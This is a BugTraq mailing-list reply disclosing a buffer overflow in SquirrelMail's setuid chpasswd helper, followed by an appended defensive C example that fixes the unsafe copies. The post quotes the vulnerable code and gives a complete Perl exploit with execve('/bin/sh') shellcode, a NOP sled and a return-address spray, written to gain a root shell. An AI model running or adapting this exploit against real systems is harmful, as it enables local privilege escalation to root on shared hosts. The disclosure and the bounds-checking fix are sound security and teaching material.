BugTraq
Re: Squirrelmail Chpasswod bof    Apr 19 2004 06:15PM
From: rip (rip at overflow dot no)
In-Reply-To: <20040417193848.GA31925 (at) piper.madduck (dot) net [email concealed]>

Hi

>> webmaster@orco:/mnt/hosting/hack/bof$ ./exploit 166 5555 99999
>
> can we please see the code for this exploit?

Certainly, but I admire your courage to ask for such a simple one tho :]

Let's take a quick peek at chpasswd.c:

<---snip--->
#define STR_MAX 100
#define MAXLEN 1024

/* in main, static, my favourite */
char User[STR_MAX];
char buf[MAXLEN];
char PUser[50];
char New_pw[50];
char Old_pw[50];

/* now let's up our privilege without really needing it yet */
if((setuid(0)) < 0) eperror("setuid");
if((setgid(3)) < 0) eperror("setgid");

/* now let's hand over control to someone, heh */
sprintf(User,"%s",argv[1]); /* heh */
sprintf(Old_pw,"%s",argv[2]); /* heh */
sprintf(New_pw,"%s",argv[3]); /* heh */

/* some humor */
if(!strcmp(User,"root")){
    printf("The %s user cannot be edited for security reasons.\n",User);
    return 4; //the root user cannot be edited for security reasons
}

/* .. snip .. */
strcpy(PUser,User); /* heh! */

/* we all see the problems here, no? */
<---snip--->

Some lame 5-minute code; it should exploit the same thing Matias did:

<---begin--->
#!/usr/bin/perl -w
# i guess this ain't of much use unless you have a web-account
# or something on the host, heh. this should be pretty self-explanatory
# - rip
use strict;

my $ret     = 0xbffff732; # return address (lands in the nop sled); worked for me, prolly won't for you. change it.
my $length  = 190;        # buffer length for smashing without ruining it (passed to generate_string, not used by it)
my $eipdist = 144;        # distance from the start of User[] to the saved eip, filled with copies of $ret
my $offset  = 0;          # offset added to $ret, taken from the command line if given
my $numnops = 10;         # number of nops between the return addresses and the shellcode
my $nop     = "\x90";     # nop
my $pw      = 'heh';      # random string, heh, 3 chars for current $ret (argv[2]/argv[3] length shifts the stack layout)

# dunno where this came from, it was just lying there.
# x86 Linux execve("//bin/sh", ["//bin/sh", NULL], NULL), 24 bytes, no NUL bytes:
#   xor edx,edx; push edx; push "n/sh"; push "//bi"; mov ebx,esp;
#   push edx; push ebx; mov ecx,esp; lea eax,[edx+11]; int 0x80
my $shellcode = "\x31\xd2\x52\x68\x6e\x2f\x73\x68".
                "\x68\x2f\x2f\x62\x69\x89\xe3\x52".
                "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

# Payload layout: [$ret x ($eipdist/4)] [nops] [shellcode]
# $eipdist bytes of repeated return addresses cover the saved eip wherever it
# sits inside that range; $ret must then point back into the nop sled.
sub generate_string($$$) {
    my ($r, $o, $len) = @_;
    my $buffer = '';
    my $i;
    my $new_ret = pack('l', ($r + $o)); # 4 bytes, native endian (little-endian on x86)
    for ($i = 0; $i < $eipdist; $i += 4) { $buffer .= $new_ret; }
    for ($i = 0; $i < $numnops; ++$i)   { $buffer .= $nop; }
    $buffer .= $shellcode;
    return $buffer;
}

if ($ARGV[0]) { $offset = $ARGV[0]; }

print "[heh] moron.pl | rip\@overflow.no\n";
print "[heh] Address: 0x", sprintf('%lx', $ret), "\n[heh] Offset $offset\n";

my $evil = generate_string($ret, $offset, $length);

# argv[1] (User) carries the payload, argv[2]/argv[3] are the old/new password.
# The trailing 0 is an extra argument chpasswd never looks at.
exec('./chpasswd', $evil, $pw, $pw, 0);
<---end--->

- rip

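The fix side of what the post above shows, as an added example that is not code from the post or from SquirrelMail's chpasswd: the quoted sprintf("%s")/strcpy copies into fixed buffers, done as bounded copies that are checked before anything privileged happens. Buffer sizes mirror the snippet (STR_MAX 100, 50-byte PUser/Old_pw/New_pw); the function names, the error codes and the simulated privilege flag are hypothetical, and the driver builds argv the way moron.pl does, so the 190-byte payload from the post is the input that gets rejected.

```c
/* Added example, not code from the original post or from SquirrelMail's
 * chpasswd: bounded argument copies, validated before privileges are raised.
 * Sizes follow the quoted snippet; names, error codes and the simulated
 * privilege flag are hypothetical. */
#include <stdio.h>
#include <string.h>

#define STR_MAX 100   /* User[] in the snippet */
#define PW_MAX  50    /* PUser[], Old_pw[], New_pw[] in the snippet */

enum { ARG_OK = 0, ARG_MISSING = 1, ARG_TOO_LONG = 2, ARG_IS_ROOT = 4 };

struct chpasswd_args {
    char user[STR_MAX];
    char old_pw[PW_MAX];
    char new_pw[PW_MAX];
};

/* Copy src into dst only if it fits, terminator included. Unlike
 * sprintf(dst, "%s", src) or strcpy(dst, src) it refuses instead of writing
 * past dst, and unlike strncpy it never leaves dst unterminated. */
int bounded_copy(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;
    while (n < dstsz && src[n] != '\0')
        n++;
    if (n == dstsz)              /* no terminator within dstsz bytes: too long */
        return -1;
    memcpy(dst, src, n + 1);     /* n bytes plus the NUL */
    return 0;
}

/* Validate and copy argv before anything else. The snippet later does
 * strcpy(PUser, User) into a 50-byte buffer, so User must fit PW_MAX too,
 * not just STR_MAX. The root check is kept as in the snippet. */
int parse_args(int argc, char **argv, struct chpasswd_args *a)
{
    if (argc < 4)
        return ARG_MISSING;
    if (bounded_copy(a->user, sizeof a->user, argv[1]) != 0)
        return ARG_TOO_LONG;
    if (strlen(a->user) >= PW_MAX)     /* would overflow PUser[50] later */
        return ARG_TOO_LONG;
    if (bounded_copy(a->old_pw, sizeof a->old_pw, argv[2]) != 0)
        return ARG_TOO_LONG;
    if (bounded_copy(a->new_pw, sizeof a->new_pw, argv[3]) != 0)
        return ARG_TOO_LONG;
    if (strcmp(a->user, "root") == 0)
        return ARG_IS_ROOT;
    return ARG_OK;
}

/* Order matters: the snippet calls setuid(0) before touching argv, so the
 * overflow runs as root. Here the privilege step (simulated by *raised, not
 * a real setuid) happens only after every argument has been accepted. */
int chpasswd_main(int argc, char **argv, int *raised)
{
    struct chpasswd_args a;
    int rc;

    *raised = 0;
    rc = parse_args(argc, argv, &a);
    if (rc != ARG_OK)
        return rc;
    *raised = 1;                 /* this is where setuid(0)/setgid(3) would go */
    return ARG_OK;
}

/* Drive chpasswd_main the way moron.pl does: argv[1] is the attack string,
 * argv[2] and argv[3] are "heh". */
int try_user(const char *user, int *raised)
{
    char *argv[] = { "chpasswd", (char *)user, "heh", "heh", NULL };
    return chpasswd_main(4, argv, raised);
}

/* Same, with argv[1] made of `len` filler bytes (len < 256), e.g. the
 * 190-byte payload moron.pl builds. */
int try_user_len(size_t len, int *raised)
{
    char filler[256];
    if (len >= sizeof filler)
        len = sizeof filler - 1;
    memset(filler, 'A', len);
    filler[len] = '\0';
    return try_user(filler, raised);
}

int main(void)
{
    int raised;
    size_t lens[] = { 3, 49, 50, 99, 190 };
    size_t i;

    for (i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        int rc = try_user_len(lens[i], &raised);
        printf("user of %3zu bytes: rc=%d privileges raised=%d\n",
               (size_t)lens[i], rc, raised);
    }
    printf("user \"root\": rc=%d\n", try_user("root", &raised));
    return 0;
}
```

The 49-byte name is the longest that passes, because it has to survive the later 50-byte PUser copy as well as the 100-byte User buffer; a 99-byte name fits User but is still refused for that reason, and the 190-byte payload never reaches the point where privileges would be raised.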
